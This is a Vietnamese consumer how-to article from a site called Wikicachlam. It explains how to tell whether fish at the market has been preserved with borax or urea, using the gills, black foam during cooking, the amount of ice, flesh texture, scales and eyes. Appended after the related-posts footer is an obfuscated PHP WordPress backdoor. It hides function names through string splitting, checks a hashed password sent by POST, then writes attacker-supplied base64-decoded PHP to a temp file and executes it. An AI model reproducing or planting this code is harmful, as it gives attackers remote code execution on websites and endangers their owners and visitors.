Cách nhận biết cá ướp hàn the, urê

Hàn the, tên hóa dược là borax, là muối natri của acid boric. Đây là một chất sát khuẩn, được dùng trong chăm sóc y tế để diệt khuẩn và nấm nhẹ. Urê là phân bón hóa học dùng trong nông nghiệp, có tác dụng kìm hãm sự phát triển của vi khuẩn. Vì giá thành rất rẻ nên không ít người kinh doanh thủy hải sản tươi sống đã dùng phân urê, hàn the nhằm giữ cho cá tươi lâu không bị ươn, thối. Tuy nhiên, cả urêhàn the đều nằm trong danh mục các loại hóa chất phụ gia không được Bộ Y tế cho phép sử dụng trong việc bảo quản và chế biến thực phẩm nên nếu lạm dụng sẽ gây nguy hại cho sức khỏe người ăn. Chính vì vậy mà Wikicachlam sẽ giới thiệu đến các bạn các cách đơn giản để nhận biết cá ướp hàn the, urê khi mua ở chợ.

Cách nhận biết cá ướp hàn the, urê

1. Dựa vào mang cá

Bằng mắt thường, khi chọn mua  các bạn nhìn vào mang cá còn đọng máu là cá tươi. Ngược lại, mang không đỏ nhưng nhìn cá vẫn rất tươi, chắc chắn đã được ướp qua hàn the.

Cách nhận biết cá ướp hàn the, urê-1

2. Xuất hiện bọt đen khi nấu

Các bạn hãy để ý kĩ khi nấu . Đối với đã qua ướp hàn the thì khi nấu sẽ nổi những bọt đen trên mặt nước, bên cạnh đó xương cá cũng có màu đen. Đối với cá tươi, khi nấu không xuất hiện bọt đen trên mặt nước và xương có màu trắng.

Xem Thêm  Những cách ăn gian điện tinh vi và phổ biến nhất hiện nay

3. Dựa vào cách ướp đá

Khi mua cá, các bạn hãy chú ý quan sát cách người bán ướp đá cho cá. Nếu là cá tươi, người bán thường bày với rất nhiều đá để giữ cá tươi lâu nhưng còn  đã ướp hàn the, urê thì thường không cần ướp với nhiều đá nữa.

Cách nhận biết cá ướp hàn the, urê-2

4. Khi sờ thấy thịt cá nhẽo

Khi đi mua cá, nếu để ý kĩ bằng mắt thường chúng ta có thể phân biệt được cá tươi với cá đã ướp hàn the, urê. Đối với cá ướp hàn the, urê nhìn thấy rất tươi nhưng khi ấn tay vào thân cá thì thấy mềm, mình cá lõm xuống do độ đàn hồi thấp ( đã chết lâu nên bắt đầu phân hủy), ngửi có mùi lạ chứ không phải mùi tanh đặc trưng của .

5. Cá ướp hàn the, urê dễ dàng bị tróc vẩy và mắt lõm vào trong

Cách nhận biết cá ướp hàn the, urê-3

Để đảm bảo an toàn cao nhất, các bạn nên chọn mua hải sản ở những cửa hàng quen uy tín và tin cậy để tránh mua phải hải sản bị ướp chất cấm. Nên chọn mua loại thực phẩm được bảo quản tốt trong hệ thống cấp đông, tủ lạnh hoặc trong đá bào nhỏ phủ kín…

Với những cách nhận biết trên Wikicachlam hi vọng bạn có thể mua cho mình những con cá tươi, ngon nhất để nấu ăn cho gia đình của mình mà không phải lo lắng về vấn đề an toàn thực phẩm.

Xem Thêm  Hình ảnh hoa chúc mừng sinh nhật đẹp nhất

Wiki Cách Làm

 

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}